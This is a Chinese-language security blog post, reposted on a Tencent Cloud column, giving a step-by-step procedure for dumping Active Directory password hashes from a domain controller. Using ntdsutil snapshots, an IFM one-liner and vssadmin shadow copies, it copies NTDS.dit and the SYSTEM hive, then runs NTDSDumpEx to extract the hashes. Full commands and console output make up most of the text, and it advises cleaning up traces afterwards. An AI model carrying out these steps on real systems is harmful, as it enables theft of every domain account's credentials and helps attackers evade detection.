首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >转储域密码哈希值

转储域密码哈希值

作者头像
安恒网络空间安全讲武堂
发布2019-09-19 11:04:00
1K0
发布2019-09-19 11:04:00
举报

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.2

前言

域用户的哈希值存储在域管服务器的NTDS.DIT的数据库文件中,除此之外还有用户信息和组成员信息。NTDS.dit文件无法直接复制到其他位置进行离线破解和提取(类似于本地存储的SYSTEM),其存储位置为:

C:\Windows\NTDS\NTDS.dit

本文主要介绍利用域管理服务器命令提取NTDS.dit文件,后续还会有其他工具的使用方法。

No.3

Ntdsutil快照

该工具域环境默认安装[Windows 2003 及以上]

查看当前快照列表

C:\Users\Administrator>ntdsutil snapshot "list all" quit quitntdsutil: snapshot快照: list all

找不到快照。

快照: quit

ntdsutil: quit

创建快照

C:\Users\Administrator>ntdsutil snapshot "activate instance ntds" create quit quitntdsutil: snapshot

快照: activate instance ntds

活动实例设置为“ntds”。

快照: create

正在创建快照...

成功生成快照集 {550f5e34-1952-475b-99ef-30ba80014363}。

快照: quit

ntdsutil

注:其中快照的guid需要取出来,挂载快照时使用

挂载快照

C:\Users\Administrator>ntdsutil snapshot "mount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: mount {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd}

已作为 C:\$SNAP_201810172200_VOLUMEC$\ 装载快照: quit

ntdsutil: quit

注:机器中有几块硬盘,那么就会生成几个快照分区,快照分区会以$SNAP_时间_VOLUME{分区名}$进行命名

寻找ntds.dit

一般情况下会在c:\windows\ntds\ 目录下

注:注意看时间,一定要最近日期的,有一些域控机器上的ntds.dit很古老,那么可能是备份到其他目录下了,需要再找一下,可能…还会遇到磁盘空间不足的情况,自行斟酌。

拷贝ntds.dit

C:\Users\Administrator>copy C:\$SNAP_201810172200_VOLUMEC$\Windows\NTDS\ntds.dit c:\windows\temp\

已复制 1 个文件。

卸载快照

C:\Users\Administrator>ntdsutil snapshot "unmount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: unmount {550f5e34-1952-475b-99ef-30ba80014363}

快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已卸载。

快照: quit

ntdsutil: quit

删除快照

C:\Users\Administrator>ntdsutil snapshot "delete {550f5e34-1952-475b-99ef-30ba80014363}" quit quit

ntdsutil: snapshot

快照: delete {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已删除。

快照: quit

ntdsutil: quit

获取注册表中的system文件

C:\Users\Administrator>reg save HKLM\SYSTEM c:\windows\temp\system.hiv

操作成功完成。

通过NtdsDumpex.exe提取域用户hash

C:\Users\Administrator>c:\windows\temp\NTDSDumpEx.exe -d c:\windows\temp\ntds.dit -s c:\windows\temp\system.hiv -o c:\windows\temp\hash.txt -hntds.dit hashes off-line dumper v0.3.Part of GMH's fuck Tools,Code by zcgonvh.

[+]use hive file: c:\windows\temp\system.hiv

[+]SYSKEY = 09135AC2D70C07F0984CF71599F7D947

[+]PEK version: 2k3

[+]PEK = 57C4CDE20126F6BE8B6FFE5649178339

[+]dump completed in 0.172 seconds.

注:这里hash.txt就是我们想要的用户hash

拷贝hash

全部结束之后记得清理现场

小福利:一句话版本

ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\temp\" q q

No.4

VSSADMIN卷影副本

卷影副本是Windows命令行一种即便被操作系统使用也能够用于管理员备份计算机,卷,文件的实用程序。卷影复制作为服务运行,并要求将文件系统格式化为NTFS,默认情况在所有现代操作系统下都是如此。从Windows命令提示符执行以下操作将创建C:驱动器盘的快照,以便用户访问通常无法访问这些文件,并将其其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。

注:要有管理员权限

查看卷影列表:

C:\Users\Administrator>vssadmin list shadowsvssadmin 1.1 - 卷影复制服务管理命令行工具(C) 版权所有 2001-2005 Microsoft Corp. 卷影副本集 ID: {9ddcbac4-00c2-4383-add4-abb96e190399} 的内容

在创建时间: 2018/9/7 22:48:01 含有 1 个卷影副本 卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}

原始卷: (C:)\\?\Volume{f73dd843-9b04-11e8-99c6-806e6f6e6963}\

卷影副本卷: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 源起机器: WIN-1O417SEMSD5.test.com

服务机器: WIN-1O417SEMSD5.test.com

提供程序: 'Microsoft Software Shadow Copy provider 1.0'

类型: ClientAccessible

属性: 持续, 客户端可问

创建卷影列表:

C:\Users\Administrator>vssadmin create shadow /for=c:vssadmin 1.1 - 卷影复制服务管理命令行工具

(C) 版权所有 2001-2005 Microsoft Corp.

成功地创建了 'c:\' 的卷影副本

卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}

卷影副本卷名: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

获取NDTS.dit和SYSTEM:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\

已复制 1 个文件。

C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

已复制 1 文件。

删除卷影列表:

C:\Users\Administrator>vssadmin Delete Shadows /For=C:vssadmin 1.1 - 卷影复制服务管理命令行工具

(C) 版权所有 2001-2005 Microsoft Corp.

确实要删除 1 卷影副本吗(Y/N): [N]? Y

成功地删了

打包拷贝!Get

END

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-09-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 恒星EDU 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档